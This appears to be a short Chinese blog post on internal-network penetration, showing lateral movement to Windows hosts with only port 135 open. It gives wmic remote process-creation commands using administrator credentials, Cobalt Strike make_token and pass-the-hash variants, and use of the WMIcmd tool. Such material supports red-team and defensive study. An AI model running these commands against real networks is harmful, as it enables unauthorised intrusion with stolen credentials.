[内网渗透]通过135端口进行横向

若内网中有windows机器只开放了135端口,可通过wmi进行执行命令横向

前提:拥有目标凭证

wmic /node:<IP> /user:administrator /password:<password> process call create "cmd.exe /c ipconfig > C:ipconfig.txt"

image-20211104152756531.png

image-20211104153152165

在CS中如果有令牌或pth可以不用帐号密码

make_token administrator <password>
# pth administrator <hash>
wmic /node:<IP> process call create "cmd.exe /c ipconfig > C:ipconfig.txt"

可是这样执行命令没有回显,如何能有回显?

使用WMIcmd

https://github.com/nccgroup/WMIcmd

但是有个前提是要知道hostname(不在域内的机器)或域名(在域内的机器)

WMIcmd.exe -h 192.168.77.171 -d WIN-887RATLMALI -u administrator -p 123456 -c whoami

image-20211104153806502

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/rnss/p/15508646.html